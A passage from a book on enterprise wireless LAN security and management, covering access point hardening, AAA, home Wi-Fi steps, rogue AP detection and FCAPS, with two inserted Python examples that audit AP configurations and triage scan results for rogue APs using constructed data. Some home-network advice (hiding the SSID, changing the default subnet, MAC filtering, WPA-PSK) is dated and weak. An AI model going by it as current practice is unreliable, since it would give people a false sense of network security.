Other non-essential management protocols: Nonessential management protocols should be disabled.
For example, if you are not using SNMP, RMON, or CDP in your existing network management
framework, disable the protocols on the access points.
Step 3. Enable secure protocols. Enable the following protocols:
Secure Shell Protocol (SSH): Provides the same functionality as Telnet (remote access to a command-line
interface on the access point) but provides communication over a secure channel.
TACACS or RADIUS: Use TACACS or RADIUS to provide a centralized authentication framework for
device administration. This will mean you do not have to manage individual admin accounts on each
access point and will ensure that you can easily update and control all administrative access to the
wireless devices.
SNMP: Simple Network Management Protocol (SNMP) is a set of protocols commonly used to manage
network devices. If you use SNMP, you should configure strong and complex community strings and
change them often. Additionally, you might want to consider using SNMP Read Only if possible because
it will prevent SNMP devices from changing access point configuration; however, this might not be
possible depending upon how you manage your network.
SNMP traffic should be limited to a particular list of host devices (SNMP network management tools) or
subnets. IP address filtering (also known as Access Control Lists, or ACLs) is a common security feature,
and in this circumstance, it allows you to limit the devices that will send and receive SNMP traffic.
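The checks in Steps 2 and 3 can be applied mechanically to an access point's saved configuration. The following Python audit is an added example, not code from the book or from any vendor tool; its syntax is modelled on Cisco IOS, and the two sample configurations, the list of weak community strings and the 12-character minimum for SNMP community strings are constructed assumptions.

```python
"""Audit an access point's management configuration against Steps 2 and 3.

Added example, not from the book or any vendor tool. The syntax is modelled
on Cisco IOS; the two sample configurations, the weak-string list and the
12-character minimum for SNMP community strings are constructed assumptions."""
import re

WEAK_COMMUNITIES = {"public", "private", "cisco", "admin"}   # assumption
MIN_COMMUNITY_LEN = 12                                        # assumption


def _blocks(lines, prefix):
    """Yield the indented body of every config block whose header starts with prefix."""
    body = None
    for ln in lines + [""]:                 # sentinel closes the final block
        if ln.startswith(prefix):
            if body is not None:
                yield body
            body = []
        elif body is not None and ln.startswith(" "):
            body.append(ln.strip())
        elif body is not None:
            yield body
            body = None


def audit_ap_config(config):
    """Return a list of findings; an empty list means the config passes."""
    lines = [ln.rstrip() for ln in config.splitlines()
             if ln.strip() and not ln.lstrip().startswith("!")]
    findings = []
    # Step 2: Telnet must be off on every vty line; only SSH may be accepted.
    for body in _blocks(lines, "line vty"):
        transport = [b for b in body if b.startswith("transport input")]
        if not transport or any(re.search(r"\b(telnet|all)\b", t) for t in transport):
            findings.append("telnet: a vty line accepts Telnet (set 'transport input ssh')")
    # Step 2: HTTP management must be disabled.
    if "ip http server" in lines:
        findings.append("http: 'ip http server' is enabled (use 'no ip http server')")
    # Step 2: nonessential discovery protocol should be off.
    if "no cdp run" not in lines:
        findings.append("cdp: CDP not disabled (use 'no cdp run' unless required)")
    # Step 3: SSH version 2 and centralised AAA (TACACS+ or RADIUS).
    if "ip ssh version 2" not in lines:
        findings.append("ssh: 'ip ssh version 2' not configured")
    central = any(ln.startswith("aaa authentication login") and
                  ("tacacs+" in ln or "radius" in ln) for ln in lines)
    if "aaa new-model" not in lines or not central:
        findings.append("aaa: administrative logins not authenticated via TACACS+/RADIUS")
    # Step 3: SNMP community strings strong, read-only and restricted by an ACL.
    for ln in lines:
        m = re.match(r"snmp-server community (\S+)\s+(RO|RW)(?:\s+(\S+))?$", ln, re.I)
        if not m:
            continue
        name, mode, acl = m.group(1), m.group(2).upper(), m.group(3)
        if name.lower() in WEAK_COMMUNITIES or len(name) < MIN_COMMUNITY_LEN:
            findings.append(f"snmp: weak community string '{name}'")
        if mode == "RW":
            findings.append(f"snmp: community '{name}' is read-write")
        if acl is None:
            findings.append(f"snmp: community '{name}' is not restricted by an ACL")
    return findings


# Constructed sample: factory-style management settings.
WEAK_CONFIG = """
hostname ap-lobby-1
ip http server
snmp-server community public RW
line vty 0 4
 login
 transport input all
"""

# Constructed sample: the same AP after applying Steps 2 and 3.
HARDENED_CONFIG = """
hostname ap-lobby-1
aaa new-model
aaa authentication login default group tacacs+ local
no ip http server
no ip http secure-server
ip ssh version 2
no cdp run
access-list 10 permit 10.10.0.0 0.0.0.255
snmp-server community Xk7pQ2mLr9vT4wB RO 10
line vty 0 4
 transport input ssh
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_ap_config(cfg) or ["no findings"])
```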

Prevent Layer 2 MAC Address Spoofing


Many access points and network devices allow you to configure Layer 2 MAC address spoofing
prevention. This step prevents devices from using a MAC address other than their own. Many attacks are
based upon spoofing a different MAC address, and this step will help mitigate that risk.

Note
Publicly Secure Packet Forwarding (PSPF) is a Cisco feature that allows you to prevent interclient communication on WLANs. This means that two stations cannot consciously or, more
importantly, inadvertently share files with others that use the same AP. PSPF allows network
access to client devices without providing other capabilities of a LAN, such as peer-to-peer.
This feature is especially useful for public wireless networks like those installed in airports or on
college campuses.

Reduce Transmit Power to Only That Required for Coverage


Access points can transmit at various signal strengths. The higher the signal strength, the greater the
distance that RF propagates, and therefore the greater the covered area. To avoid the risk of
unauthorized users connecting to your WLAN, it is important not to let your radio signal "bleed"
uncontrollably into the surrounding area.
By reducing the transmit power, you can more carefully manage your cell size and design, controlling
the degree to which your WLAN extends outside of your physical building or office space.
Managing the power and range improves security by reducing the potential threats to your WLAN.
Although this technique reduces the footprint that an attacker can use to exploit the network, it only
prevents casual discovery. DoS attacks are still a possibility as an attacker can still transmit into your
network causing radio interference.

Consider Directional Antennas

Directional antennas allow you to shape the coverage area of your WLAN. Although not a security setting
per se, directional antennas can, like reducing transmit power, help ensure that wireless coverage does
not bleed into areas that you do not want to cover. Even when physical and logical security are tight,
there is no reason to extend your footprint into uncontrolled areas.

Note
Directional antennas can also be used to provide more accurate coverage in problematic
deployment spaces, such as large factory floors, hallways, and operating rooms.

Physically Secure APs


You should physically secure the access points. Many manufacturers provide mounting brackets that
allow you to physically lock down access points. This is important because access points can contain
information on the configuration of your network. Ensuring physical security of the device not only
protects your capital assets but also removes one more potential area where attackers can target your
deployment.

Use AAA
The authentication, authorization, and accounting (AAA) architecture you use is important for all network
security, and WLANs are no different. WLANs require a method to authenticate users and to manage an
encryption key exchange. AAA systems provide the industrial strength authentication management
system needed to support this in a scalable and resilient fashion. As a backbone service, the AAA
systems need to have a breadth of support for EAP types and must be scalable.

AAA and EAP


Remembering that EAP is the recommended method for securing the radio transmissions of your WLAN,
you should ensure that your AAA service can support an EAP type. The EAP family of protocols is
"extensible," meaning many varieties are available, including several proprietary versions. Some AAA
servers do not support all EAP mechanisms. If you already have an existing AAA server in your
infrastructure, it is crucial that you ensure that it supports the EAP mechanism you choose for your
WLAN. Alternatively, you could install a dedicated AAA server or servers for WLAN use only. However,
this is likely to be cost-prohibitive because more devices need not only to be acquired but also managed
on an ongoing basis.

AAA Scalability and Availability


Like all centralized services on a network, it is important that your AAA infrastructure is scalable and
stable. Because AAA servers are fundamental to a secure network, their availability and reliability are
essential for a secure network. If you are deploying a large-scale or global network, it's important to
plan your AAA architecture accordingly. Centralizing all authentication on a single system is not good
practice; it's better to use a distributed system with several AAA servers to avoid a single point of
failure. A distributed AAA architecture not only has better resilience and disaster recovery capabilities
but also provides the added benefit of load-balancing among available AAA servers. In global
deployments, for example, it's common to have AAA servers regionally dispersed. Not only does this
ensure that you have a resilient system, but it also keeps authentication traffic regional.
Some solutions allow AAA services to reside locally, which means that the authentication is performed on
the AP or switch servicing that WLAN. This solution can be attractive for very large-scale deployments
where you might have hundreds or thousands of local WLANs (for example, small retail stores or bank
branches).
Remember that losing connectivity to your AAA server means that users cannot authenticate; therefore,
the WLAN, as a transport medium to the network as a whole, is unavailable. As such, a robust AAA
architecture is essential.

Physically Secure the Office Space


A necessity of any network is ensuring physical security of the environment. Your wireless network is no
different and in some cases can be considered more susceptible to attacks by intruders because APs are
typically not placed in secured wiring closets, but rather in open areas. It is therefore essential, for many
reasons, that you have good physical security in your office space and adjacent areas.

Note
Many large corporations have sizeable parking lots or public areas that surround their office
buildings. It is prudent to make your security staff aware that uninvited or "suspicious" visitors
might be attempting to eavesdrop on your WLAN. Educate them to be aware of potential war
walkers and war drivers.

Communicate with Your Users


A robust wireless security posture, a strong wireless security policy, and comprehensive security
procedures are all devalued if your user population is unaware of them or ignorant of the risks of poor
behavior. As such, communication with your users about security is a fundamental aspect of securing
your WLAN. The vast majority of your users will be welcome partners in your ongoing security efforts if
they are engaged successfully and educated on how to help.
Consider using multiple communications methods to provide your user community with a comprehensive
source for information about the wireless network. Include FAQs, user education documents, WLAN
news bulletins, deployment updates, and even links to software and external resources. We recommend
that, at the very minimum, you engage in communications with your WLAN users regarding the following
three topics:

WLAN security policy: Your wireless security policy should be clear and concise when
communicated to your users. Make the policy easy to understand and free from as much technical
jargon as possible.
Fundamentals of wireless: Educate your users about the benefits and the fundamentals of
wireless networking. The vast majority of users will work with you to secure your network through
responsible actions. For example, when people understand the risks associated with rogue access
points, most will refrain from installing them. Treat your users as partners, and they will greatly
assist you in securing your network.
Updates on security developments: Your network users are best served when they know what
developments happen in the wireless security world, including current risks, common types of
attack, and possible intrusion efforts (hacks). Network security is a constantly evolving area with
new attacks and tools being developed continuously. It is important to remain aware of
developments in this area and pass that information on to the user community in a timely manner.

Secure Wireless at Home


If your company provides remote access services to your users, then home wireless networking
policies and guidelines are recommended. Many large enterprises allow their users to connect to the
corporate network from home. In many circumstances, these remote access services are provided not
only by standard analog modems but also by "always on" high-speed connections, such as cable
modems, xDSL, ISDN, and even dedicated Frame Relay or WAN links. In all cases, it is very important to
publish strict guidelines on the acceptable use of wireless devices at the home. Consider that these
services effectively extend the corporate network to your users' homes. The WLAN access point that is
installed at the home is no different than a rogue AP and hence brings along the same risks.
The different strategies for mitigating these threats are discussed next. Note that not all the solutions
enable the full extension of the corporate network to the WLAN-enabled home.

Ban Home Wireless on Corporate Remote-Access Equipment


A policy decision could be made simply to ban the use of wireless access points on corporate equipment
at users' homes. This is in some ways the easiest solution but the one that has the most negative impact
on the user. However, any such ban needs to be preceded by education on the merits of such a
position.

Provide Corporate Support for Home Access Points


A list of recommended or supported WLAN devices can be created, with specific configuration guidelines
for each. Your users can then configure their access points using the instructions provided to conform
with corporate security requirements.

Provide Home Wireless Recommended Practices


A list of recommended practices specifically for home wireless networking can be provided for your
users. These best practices might not provide detailed configuration guidelines for every make and
model of access point, but they should provide the users with advice on the "high-level" concepts of
configuring their devices securely.
Provide a simple step-by-step guide such as the sample presented here. A dual approach consisting of a
"quick setup" as well as a more comprehensive and detailed version is ideal:
Step 1. Change the default SSID. Your access point will come with a default SSID when you install it.
Change this as soon as possible to avoid the compromise of the AP.
Step 2. Disable SSID broadcast. Access points broadcast their SSIDs by default. This is not necessary
for most home wireless networks. Disabling this feature will not allow neighbors to easily discover
your home WLAN.
Step 3. Enable WPA-PSK. Most access points now support WPA-PSK (Wi-Fi Protected Access Pre-Shared
Key). This encryption and key management standard greatly increases the security of your home
wireless network. WPA-PSK is configured on both your access point and any devices you use on
the wireless network (desktop and laptop PCs, and so on). Because it is configured by using a shared
secret on all devices, create a shared secret that is at least 20 characters long and not easy to
guess.
Step 4. Change the default admin login password. Change the default password for the admin account
on your access point to avoid unauthorized users gaining the administrative access that allows
configuration of the AP. The default password is well known and hence it defeats its purpose.
Change it to something only you know or will remember. Choose a strong password and not one
that is easy to guess such as "password" or "1234".
Step 5. Change the default IP address. Access points come pre-configured with a particular IP address
when they are installed. Typically, it is 192.168.1.x (where x is a number between 1 and 254). Most
hackers are familiar with these IP addresses. You should change this value and choose an IP
address in the range 192.168.x.1 (where x is a number between 2 and 254) to make it harder for a
hacker to infiltrate your network. For example, you could change the default IP address to
192.168.153.1.
Step 6. Reduce the DHCP scope. Home wireless access points usually act as Dynamic Host Configuration
Protocol (DHCP) servers. This means they provide your desktop or laptop with an IP address when
requested. Most access points provide IP addresses from a "pool" of available numbers. This pool
can contain up to 253 IP addresses. Because you are likely to have only a handful of devices
requiring an IP address, consider reducing the DHCP pool number. For example, if you have only a
single laptop you want to use on your home WLAN, you could reduce the DHCP pool to only one
or two addresses. This change will reduce the risk of unauthorized users accessing your WLAN.
Step 7. Reduce transmit power. Most access points transmit at the maximum power possible when
initially installed. This sometimes has the unwanted result of expanding the coverage of your
home wireless network outside or into neighboring areas. Reduce the transmit power to provide
only the coverage you require.
Step 8. Use static IP addresses. Assigning individual IP addresses to end devices and disabling DHCP will
help control who has access, as you limit the possibilities for unwanted people to access your
network.
Step 9. Enable MAC address filtering (advanced and optional step). It is possible to configure most
access points with a list of MAC addresses that are the only ones permitted to use the WLAN. With
this technique, you effectively "filter" the network and only allow the devices with the MAC
addresses you select. This technique helps prevent unwanted users from accessing your home
wireless network. Be sure to select the correct MAC address (the one of your WLAN NIC) if your
computer has more than one network interface.
Step 10. Disable web access (advanced and optional step). You can disable web access on your access
point. By doing so, attackers cannot log on or configure your access point using a web browser.
Note that this means you also will be unable to log on to your access point and will have to use
the command-line interface thereafter. Therefore, this option is suitable only for advanced users.

Determine How to Support and Secure Mobile Devices


Mobile devices such as PDAs and "smart phones" present their own security challenges. A policy and
support plan for these devices is recommended for every corporation. If you choose to support these
devices on the wireless network, you should ensure that they, like the rest of your client devices, are
detailed in your security posture statement. Many issues will need to be addressed including, but not
limited to, the following:
What OS is supported (PalmOS, PocketPC, and so on)?
What wireless client software is required?
Can user IDs and passwords be cached on the device (a common but very risky attribute of these
devices)?

Determine How to Support and Secure Clients


One of the most difficult aspects of an effective and successful WLAN deployment is client management.
The ability to control, both physically and logically, the expectations and capabilities of client devices is
paramount. The threat of a client performing actions that mimic an AP is serious because this is
sometimes the cause of DoS attacks. To mitigate any possibility of the client device being the weak link
in the security of the WLAN, there also must be active control as to which clients are supported and what
their abilities are.

Manage Clients and Client Attributes


Beyond developing a policy and list of supported client devices, the policy needs to outline attributes of
the devices. Controlling these attributes helps to ensure that devices not supported in your security
policy are not permitted on the network, thereby strengthening your overall security posture.

You should consider the following three aspects of a client device:
Platform: Define what platforms are supported. This not only includes the make and model but also
specific wireless adaptor cards that client devices may use.
OS: Specify a list of supported operating systems and the particular revision level. This will not only
ensure a consistent and uniform security posture but also make it easier for your operations staff to
isolate problems as several degrees of variability are removed.
Client software: Define a single common wireless client software application. This can be as simple
as selecting the native client capabilities in the operating system (Windows XP Wireless Networking,
for example), the client software provided with mobile devices and laptop computers, or a standard
third-party client for use across all devices (such as that offered by Funk or Meetinghouse).

Anti-Virus
Although not specifically a wireless issue, user laptops and desktops should be provided with regularly
updated anti-virus software. WLANs, just like any network, can propagate viruses if the client devices
are not configured with appropriate software.

Soft AP
Some wireless software is available that allows a laptop or desktop computer to act as an access point.
This software-enabled access point or soft AP is considered a major threat because it is usually a trusted
device. The soft AP creates the same security threat as the unauthorized installation of rogue access
points. In some ways the soft AP can be a more dangerous threat because many hackers will use them
to stage attacks. Because a successful hacker can turn any computer into an AP, he is no longer tied
down by the physical placement of regular APs. In essence, the soft AP could enable a hacker to place an AP
wherever there is a computer. As such, we recommend that you disallow the use of this software
capability and make it very clear in your wireless security policy that such software is unacceptable.
Actively detecting soft APs is very difficult and this is another reason why radio-based rogue access point
detection is of critical importance.

Disable Ad-Hoc Mode Networking


Although this is primarily a policy decision, depending upon the wireless client software you use, it may
be possible to disable ad-hoc networking. Some client software allows you to disable certain functions
using centralized administration tools.

Detect Rogue APs


Rogue access points are access points that are located within your enterprise and that were not installed
by your IT department or approved vendors. They present a very serious security threat when
connected to your network as they are improperly configured with little or no security settings.

A robust rogue AP detection system is critical for any secure wireless network. Indeed, rogue AP
detection is critical because there is no such thing as a "non-wireless" network anymore; even if you
haven't deployed a WLAN, you cannot assume that there is no WLAN, as staff are purchasing cheap
access points and installing them themselves, often without realizing the security implications.
It should be noted that the vast majority of rogue access points come from your own users, and only a
small minority are from malicious hackers. Most user-installed rogue APs are not intended to
compromise security but are attempts at benefiting from wireless networking without realizing the risks
of poorly configured devices. If you have a comprehensive entitlement policy and wide coverage area,
you will reduce the likelihood of rogue APs being installed in the first place.
Detecting rogue access points can be challenging. A combined approach of client-based reporting,
radio-based detection, and network scanning is the best method.

Client-Based Reporting
Client-based reporting can be as simple as asking your users to report suspicious access points to the IT
department. These can be nonstandard (enterprise) AP models, APs in unusual locations such as hidden
under desks, and consumer-grade access points on desks or in cubicles. This reporting will allow your IT
team to investigate and address the threat if it turns out to be real.
Additionally, some solutions now available on the market allow for wireless clients, such as laptops, to
actively and automatically report a list of access points they have encountered to a back-end management
system. This reporting is entirely transparent to the user, but it allows your wireless management
framework to construct a picture of all the access points in your enterprise. If an access point is reported
but is not listed or managed by your network management system, there is a chance that it is a rogue.

Radio-Based Detection
Radio-based detection uses your own access points, or dedicated scanners, to actively monitor the RF
spectrum and report all radio devices they detect. Effectively, your access points are "auditing the
airwaves" and drawing up a picture of the radio frequency use in your enterprise. Most of the leading
manufacturers provide radio-based rogue access point detection services with their products. These
often have the advantage of providing you with a graphical representation of what your radio network
looks like, using floor plans and colored cells or clouds to represent each 802.11 cell.
Radio-based detection can also be carried out manually by IT staff using handheld wireless network
analyzers or laptops with software designed specifically for this purpose. These include popular tools
such as AirMagnet, Kismet, and AirSnort.

Network-Based Detection
Network-based detection is the third essential pillar of a robust rogue access point detection system.
Network-based detection uses internally developed or publicly available tools to scan the wired network
for devices that match a particular signature or "fingerprint." These devices scan for familiar MAC
addresses, specific open TCP ports, and particular protocols and processes that might be running on a
device. These tools can even attempt to log on to the device and note its response. By combining
several criteria and automating the process into regular scripted jobs, network-based reporting can
quickly produce a list of suspicious devices. Your IT department can then use this list to investigate the
devices and act accordingly. One of the most popular publicly available pieces of software that can be
used for this purpose is WinFingerPrint (http://winfingerprint.sourceforge.net/).
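A fingerprint triage of the kind described above, as an added example rather than the book's or WinFingerPrint's code: each wired host not in the managed AP inventory is judged on its MAC OUI, its open-port set and its HTTP banner, and is flagged only when several criteria agree. The scan results, inventory, port profile, banner hints and the min_hits threshold are constructed assumptions, and the OUI table is illustrative and should be checked against the IEEE OUI registry.

```python
"""Triage wired-scan results for rogue access points (added example; not the
book's or WinFingerPrint's code). All inputs below are constructed samples."""
from dataclasses import dataclass, field

# Illustrative vendor OUIs (first three octets of the MAC): an assumption to
# be checked against the IEEE OUI registry and the AP models you actually run.
AP_VENDOR_OUIS = {"00:40:96": "Cisco Aironet", "00:0c:41": "Linksys", "00:09:5b": "Netgear"}
# Management port set an embedded AP web/CLI typically exposes (assumption).
AP_PORT_PROFILE = {23, 80, 443}
# Words that commonly appear in the banner or login page of an AP's embedded
# web server (assumption).
AP_BANNER_HINTS = ("httpd", "wireless", "wlan", "router")


@dataclass
class Host:
    """One host seen by the wired scan."""
    ip: str
    mac: str
    open_ports: set
    banner: str = ""

    @property
    def oui(self):
        return self.mac.lower()[:8]


@dataclass
class Verdict:
    host: Host
    status: str                      # "managed", "suspicious" or "clear"
    reasons: list = field(default_factory=list)


def triage(hosts, managed_ap_macs, min_hits=2):
    """Classify each host: APs in the inventory are 'managed'; any other host
    is 'suspicious' when at least min_hits independent fingerprint criteria match."""
    managed = {m.lower() for m in managed_ap_macs}
    verdicts = []
    for h in hosts:
        if h.mac.lower() in managed:
            verdicts.append(Verdict(h, "managed"))
            continue
        reasons = []
        if h.oui in AP_VENDOR_OUIS:
            reasons.append("MAC OUI registered to " + AP_VENDOR_OUIS[h.oui])
        if AP_PORT_PROFILE <= h.open_ports:
            reasons.append("opens the Telnet/HTTP/HTTPS set typical of an AP")
        hits = [w for w in AP_BANNER_HINTS if w in h.banner.lower()]
        if hits:
            reasons.append("banner mentions " + ", ".join(hits))
        status = "suspicious" if len(reasons) >= min_hits else "clear"
        verdicts.append(Verdict(h, status, reasons))
    return verdicts


def suspicious_ips(verdicts):
    """IPs the IT department should go and look at."""
    return [v.host.ip for v in verdicts if v.status == "suspicious"]


# Constructed inventory of APs installed by IT, keyed by wired MAC.
MANAGED_AP_MACS = {"00:40:96:aa:bb:01", "00:40:96:aa:bb:02"}

# Constructed scan output: a managed AP, a consumer AP under a desk, an
# ordinary web server, and a device whose AP-vendor OUI alone is not enough.
SCAN = [
    Host("10.20.0.10", "00:40:96:aa:bb:01", {22, 443}),
    Host("10.20.0.57", "00:0c:41:12:34:56", {23, 80, 443},
         "Server: httpd\nWireless Broadband Router login"),
    Host("10.20.0.80", "00:1a:2b:3c:4d:5e", {80, 443}, "Server: Apache/2.0"),
    Host("10.20.0.91", "00:09:5b:de:ad:01", {80}),
]


def demo():
    """Run the triage over the constructed scan; returns the verdict list."""
    return triage(SCAN, MANAGED_AP_MACS)


if __name__ == "__main__":
    for v in demo():
        print(f"{v.host.ip:<12} {v.status:<10} {'; '.join(v.reasons)}")
```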

Respond to Detected Rogue APs


After you have identified a rogue access point, you need to act. The potential responses can be
categorized under three headings: remove, reclassify, and remediate.

Remove
You can remove the rogue access point from the network. You can achieve this by disabling the network
switch port to which it is attached (if applicable), or you can confiscate the device or instruct the owner
to comply with your IT policies and power off or remove the rogue access point. If the device is not
physically within the confines of your enterprise, you might need to "work around" the problem and
reconfigure some of your access points to remove the interference and contention.

Reclassify
You can reclassify many rogue access points, especially those identified during the initial discovery
phase, as friendly and therefore no longer a security risk. Friendly APs can be those that are internal to
your network, such as those in labs. Conversely, friendly APs can be external, such as those in shared
office spaces where another company manages and controls the APs. Keep the knowledge of the
function or ownership of these friendly APs for reference later when you audit rogues.

Remediate
Finally, you simply might want to remediate some rogue access points and ensure that they are
supported by your IT department and have the correct configuration. This choice can be due to a valid
requirement for WLAN coverage in a particular area, or it simply can be due to a bad configuration in an
access point that was officially supported.

Consider Using Intrusion Detection Systems


Many corporations opt for dedicated wireless intrusion detection systems (wireless IDSs). Many leading
wireless equipment manufacturers also provide this service with their solutions. Wireless IDSs are a
more advanced and dedicated approach to radio-based rogue access point detection. They often use
dedicated "scanners" (often access points themselves, but sometimes cheaper scan-only devices) and
specialized software. They can also be used to detect client behavior that you might want to prevent,
such as the creation of ad-hoc wireless networks and client-to-client file-sharing networks.
Wireless IDSs provide a very good level of security and are often used by corporations that want to
restrict or ban the use of wireless networks entirely. However, every large-scale enterprise-class
network can benefit from the added security they provide.

Summary
This chapter outlined the many threats to WLAN security, both intentional and unintentional. Most of
them are risks that you can reduce through proper planning and education. Today's threats include the
interception of traffic (including attacks that recover weakly encrypted data) and denial of service
attacks. Their potential negative business impact has placed a great deal of emphasis on security
practices, protocols, and the ability to protect against malicious attacks. The risk, however, does not
stop there: the policy and methodology of WLAN security protection must also act as a defense against
casual or incidental acts that result from the unaware employee or user.
Today, WLAN security is built on identification of the client, authentication and authorization of the
user, and encryption of the data. Because wireless communication cannot be perfectly confined to an
area, this three-tiered security framework is essential for protecting the WLAN. 802.1X is the foundation
framework for the authentication process; EAP carries the actual authentication exchange over it. Over
time, many different standards have evolved with the intent of protecting the WLAN. Currently, 802.11i
(marketed as WPA2) is the newest standard developed specifically to address WLAN security. WLAN
security will continue to be one of the foremost considerations when building a WLAN solution for the
enterprise. This chapter covered the fundamental information needed to develop a holistic and robust
security plan for the WLAN.
The WLAN must be protected through preemptive actions. This begins with building standards based on
best practices for the configuration of the client and AP. Further efforts are put into securing the physical
space, monitoring for rogue APs, and taking charge of the airspace. Underpinning all these efforts is the
ability to provide client education and to ensure that the integrity of the network remains intact by
thwarting accidental events.
Finally, you should be able to place as much trust in the security of the WLAN as you do in the
traditional wired network. No solution is infallible, but with proper planning, education, and monitoring,
the WLAN can be held to the same security standard as the rest of your infrastructure.

Chapter 8. Management Strategies for Wireless LANs

Wireless networks are usually more challenging to manage than wired networks. The physical aspects of
a typical wired network are stable and predictable; the transport medium itself, "the wire," does not
change. Wireless networks, however, operate in a very dynamic environment. User experience can differ
from day to day, depending upon factors such as the number of concurrent users, interference,
multipath effects, and even time of day; for example, the radio frequency (RF) "landscape" of a WLAN
will be different at 6 a.m. than it will be at 3 p.m. during a typical working day. Furthermore, because of
the unlicensed nature of WLANs, there is always the risk that neighboring networks will spring up to
interfere with what was previously a stable environment. Finally, wireless technology is relatively new,
and many experienced networking professionals are still unfamiliar with the solutions, challenges, and
strategies for carefully managing this environment.
Even when you take the WLAN's unique physical properties into account, a WLAN can still be considered
simply another transport mechanism. As such, many of the standard management strategies that are
tried and tested in the wired networking world are equally applicable to wireless networks; the common
themes of fault and configuration management, performance tuning, and operational support need only
be slightly modified to ensure that your WLAN is as stable, reliable, and secure as your wired network.
You must also consider the two general approaches to WLAN architecture (the centralized model and the
distributed model) and the tools that are available to you. When considering the specifics of WLAN
management, you can view it as having three facets:
RF management
Host management
Client management
However, before delving into these topics, you must address a more fundamental question; that is, you
must determine what strategy your enterprise will adopt for wireless network management.

Solutions Lifecycle
Managing the WLAN can be considered part of two phases of the PPDIOO solutions lifecycle: operating
and optimizing. Unlike previous phases, operating and optimizing your WLAN can have a long duration
because they are ongoing even while you begin to plan, prepare, design, and implement the next
generation of your wireless network.
Management strategies for WLANs are the day-to-day manifestations of operations and optimization. As
a refresher, Figure 8-1 illustrates the PPDIOO solutions lifecycle.

Figure 8-1. PPDIOO Solutions Lifecycle

Management Strategies
How should the enterprise manage its WLAN? What tools should be used? What strategy should be
adopted? These are the challenging questions that you should answer before the wireless network is
being deployed.
No single product offers a complete solution. Some recommendations can be made safely, however, as
follows:
Use vendor-specific wireless management tools where possible.
Integrate wireless management into the existing network management framework.
Use fault management, configuration management, accounting management, performance
management, and security management (FCAPS) methodologies as a pointer to the standard areas
that your wireless management system should address.
Define a client management process. This is overlooked by FCAPS. (You learn more about FCAPS
later in this chapter in the "FCAPS" section.)
Develop in-house tools to plug any gaps not addressed by the vendor-specific wireless
management tools and to satisfy any unique reporting or management requirements that you
might have.
Another fundamental decision that you must make is whether to handle wireless network management
in-house or to outsource this activity to a trusted partner. Most enterprises will likely manage their own
networks, but outsourcing this activity is no longer uncommon.

In-House WLAN Management


Managing the WLAN in-house is perhaps the most common approach. Most enterprises will have their
own dedicated IT support staff. In these circumstances, it makes sense for your IT organization to treat
the wireless network no differently from the rest of your IT infrastructure. It is simply considered
another transport medium, similar to the wired network but with some unique characteristics.
Some enterprises choose to outsource the implementation and deployment of their WLAN but choose to
retain management responsibilities. This choice is common in sensitive industries or areas, such as
finance, government, or military organizations, but it is by no means limited to these. Providing native
access to your network is often considered a security and business risk. This reasoning is especially
understandable when you consider that WLAN management entails the ability to capture and analyze all
traffic, which is not something that every enterprise is comfortable with a third-party undertaking.
The disadvantages of retaining responsibility for WLAN management are also worth noting. Although
WLANs are just another network, the fact remains that they require wireless-specific skills. Your existing
IT support staff will need to familiarize themselves with this new technology and the unique
management and security challenges it presents. This familiarity can often be achieved through on-the-job
training, but such training typically entails a steep learning curve and an increased risk of poor
management performance. Staff in training can themselves be a risk because they can be unaware of the
errors they make or can cause security breaches. A more prudent approach is to engage in professional
training that is supplied either by the WLAN equipment vendor or by one of the many independent IT
training organizations.
When your IT staff are suitably trained or familiar with the WLAN technologies, you still must define,
develop, and adopt an appropriate WLAN management strategy. This process entails selecting the
appropriate tools, ensuring proper integration, and developing systems and procedures to automate as
much activity as possible. On-the-fly, reactive management is not a safe or prudent approach for an
enterprise-class wireless network.

Outsource WLAN Management


Outsourcing wireless network management is an attractive option for many enterprises that do not have
the resources and skills in-house. This option avoids the need to train your IT staff in wireless
technologies. Indeed, many enterprises outsource their network management entirely. In such a
situation, wireless network management is just another service that is provided by your trusted third
party. Both tangible and intangible costs are involved in this approach, such as the monetary cost of
engaging the vendor and the administrative cost of managing its activity. In the end, the expense
might be lower than employing or training staff yourself. In the outsourced model, the responsibilities
that remain with you are to monitor the key performance indicators (KPIs) and Service Level Agreements
(SLAs) that you have set with the external vendor and to ensure user satisfaction. Careful economic
(strategic, tactical and financial) consideration is required to determine what is most beneficial for your
specific environment.
Before choosing the outsourcing option, you must be comfortable with the fact that your network traffic
will be visible to the third party, that access to your network infrastructure will be required, and that due
diligence is undertaken to ensure that security and business processes are not compromised.
Outsourcing removes some of the headaches of WLAN management from you and your enterprise, but it
should only be undertaken after a prudent risk and business case review.

FCAPS
FCAPS (fault, configuration, accounting, performance and security), the ISO model for network
management, is a functional approach that segments management areas into discrete categories, which
allows the network manager or management framework to address each in turn and ensure that no area
is overlooked. FCAPS is a model, not a product. Many network management applications and designs
adopt FCAPS, and internally developed procedures and tools can also be architected along these lines.
Even if your management product, framework, or application does not mention FCAPS, the five areas
covered by this model are probably addressed. If they are not, then there is value in identifying the gaps
in your management strategies. FCAPS is therefore useful to assist the network manager in ensuring
that a structured, methodological approach is taken to network management and that haphazard or
reactive management techniques and strategies are avoided.
FCAPS was born "in the wired world" of centrally managed environments. As mentioned earlier, wireless
networks present many unique challenges. Chief among these is the dynamic nature of the transport
medium. So although FCAPS is a useful tool, or indeed a useful mindset, with which to approach wireless
network management, you must ensure that it is either updated or enhanced to include the distinct
aspects of the wireless environment or only used as a tool to help guide your management strategies.
The next sections briefly examine the five functional areas of FCAPS and its shortcomings.

Fault Management
In this area, service-impacting events are identified and resolved. The network is monitored for
problems, and when identified, they are isolated and corrected. This functional area keeps the network
running. Downtime is minimized, and the network is kept operational. Fault management is perhaps the
most well-known area of network management.

Configuration Management
Within the configuration management functional area, the network is monitored, the status or design is
maintained, and any changes to network components are carefully planned, recorded, managed, and
performed. Subjects such as the IP addressing scheme, routing tables, wireless VLAN and Service Set
Identifier (SSID) assignment, and information on the physical devices and their logical layout are
handled in the configuration management area. Moves, adds, and changes are also dealt with here
because they affect the configuration of the network. Reporting on planned and past changes forms part
of this functional area.

Accounting Management
Accounting management is focused on the user and is the domain where data about network usage is
collected, collated, reported, and then acted upon. The gathering of statistics allows the network
manager to monitor usage, detect inefficiencies, bill users or groups for access (if applicable), and
produce trending reports to assist in proactive design and reconfiguration. Accounting management
allows you to monitor the actions of users, make better use of the available resources, and plan
accordingly for improvements. Reporting on historical use, called trend reporting, is an important facet
of this functional area.

Performance Management
Performance management is similar to accounting management in that you collect data from the
